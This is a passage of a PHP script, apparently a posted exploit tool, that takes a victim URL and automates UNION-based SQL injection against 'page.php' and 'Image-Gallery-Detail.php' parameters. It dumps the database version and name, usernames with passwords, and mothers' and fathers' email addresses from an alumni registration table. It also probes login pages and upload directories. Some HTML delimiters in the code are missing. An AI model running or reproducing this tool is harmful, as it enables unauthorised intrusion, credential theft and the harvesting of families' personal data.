', '', '
');
foreach($sperimental as $sperimentalx) {
$getall=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10--");
$getallz=explode("$sperimentalx",$getall);
$getallz=explode("
",$getallz[1]);
var_dump(strip_tags($getallz[0]));
print "
#DB Name: ";
$getalll=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,database(),3,4,5,6,7,8,9,10--");
$getallzz=explode("$sperimentalx",$getalll);
$getallzz=explode("
",$getallzz[1]);
var_dump(strip_tags($getallzz[0]));
} //???
$sperimentalz = array('', '', '
');
foreach($sperimentalz as $sperimentaly) {
print "
#users:
";
$get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--");
$usertbl=explode("$sperimentaly",$get_users);
$usertbl=explode("
",$usertbl[1]);
var_dump(strip_tags($usertbl[0]));
} //??? #2
$sperimentalzz = array('
', '', '
');
foreach($sperimentalzz as $sperimentalxy) {
print "
";
print "
#E-Mails Founds in database:
";
$get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--");
$usertbl=explode("$sperimentalxy",$get_users);
$usertbl=explode("",$usertbl[1]);
var_dump(strip_tags($usertbl[0]));
print "";
} //??? #3
if(file_get_contents("$host". "upload/")) {
print "
#Lucky Strike
";
$found_DIRt = file_get_contents("$host". "upload/");
print $found_DIRt;
print "";
}
};;;
//#image-gallery-detail
if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "two")) {
$host = $_POST['victim_url'];
$num = $_POST['num_var'];
$bug = $_POST['select_bug'];
//portal Login and General Login
$Loginss = array("login/login.php", "login/?next=");
foreach($Loginss as $nullus_Loginss) {
if (false!==file("$host$nullus_Loginss")) print "Found:
";
};
print "
";
print "#host: $host
";
print "#DB Version: ";
$sperimental_gall = array('Image Gallery /', '', '');
foreach($sperimental_gall as $sperimental_gallery) {
$getallx=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
$getallzx=explode("$sperimental_gallery",$getallx);
$getallzx=explode("",$getallzx[1]);
var_dump(strip_tags($getallzx[0]));
//.................OR..................
$getallxb=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
$getallzxb=explode("$sperimental_gallery",$getallxb);
$getallzxb=explode("",$getallzxb[1]);
var_dump(strip_tags($getallzxb[0]));
//.................OR..................
$getallxbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
$getallzxbc=explode("$sperimental_gallery",$getallxbc);
$getallzxbc=explode("",$getallzxbc[1]);
var_dump(strip_tags($getallzxbc[0]));
print "
#DB Name: ";
//#database();
$getallxdb=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
$getallzxdb=explode("$sperimental_gallery",$getallxdb);
$getallzxdb=explode("",$getallzxdb[1]);
var_dump(strip_tags($getallzxdb[0]));
$getallxdbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
$getallzxdbc=explode("$sperimental_gallery",$getallxdbc);
$getallzxdbc=explode("",$getallzxdbc[1]);
var_dump(strip_tags($getallzxdbc[0]));
$getallxdbcd=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
$getallzxdbcd=explode("$sperimental_gallery",$getallxdbcd);
$getallzxdbcd=explode("",$getallzxdbcd[1]);
var_dump(strip_tags($getallzxdbcd[0]));
print "";
}
//beyond
//Variant 1#
$sperimental_gallv = array('Image Gallery /', '', '');
foreach($sperimental_gallv as $sperimental_galleryvv) {
print "
#users:
";
$getallxk=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
$getallzxk=explode("$sperimental_galleryvv",$getallxk);
$getallzxk=explode("",$getallzxk[1]);
var_dump(strip_tags($getallzxk[0]));
print "";
//Variant 2#
$getallxdbcww=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
$getallzxdbcww=explode("$sperimental_galleryvv",$getallxdbcww);
$getallzxdbcww=explode("",$getallzxdbcww[1]);
var_dump(strip_tags($getallzxdbcww[0]));
//Variant 3#
print "
";
$getallxdbcwwxx=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
$getallzxdbcwwxx=explode("$sperimental_galleryvv",$getallxdbcwwxx);
$getallzxdbcwwxx=explode("",$getallzxdbcwwxx[1]);
var_dump(strip_tags($getallzxdbcwwxx[0]));
print "";
}
//#Dir trav.
if(file_get_contents("$host". "upload/")) {
print "
#Lucky Strike
";
$found_DIRt = file_get_contents("$host". "upload/");
print $found_DIRt;
print "";
}
};;;;
//#IFRAME method=100% success
//--IF you usage this method select well value page or try random value--
if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "iframe")) {
$host = $_POST['victim_url'];
$num = $_POST['num_var'];
$bug = $_POST['select_bug'];
print "
";
//portal Login and General Login
$Loginssx = array("login/login.php", "login/?next=");
foreach($Loginssx as $nullus_Loginssx) {
if (false!==file("$host$nullus_Loginssx")) print "Found:";
};
print "
";
print "page.php?PAGE= ";
print "#DB Version ~ #DB Name: ";
print " ";
print "#users: ";
print " ";
print "#E-mails: ";
print " ";
print " |
";
//#Variant 1
print "";
print "Image-Gallery-Detail.php?gal_id= ";
print "#DB Version: :";
print " ";
print "#DB Name: :";
print " ";
print "#users: :";
print " ";
print " |
";
//#Variant 2
print "";
print "image-gallery-detail.php?gal_id= ";
print "#DB Version: :";
print " ";
print "#DB Name: :";
print " ";
print "#users: :";
print " ";
print " |
";
print "";
};;;;;
?>
[/code]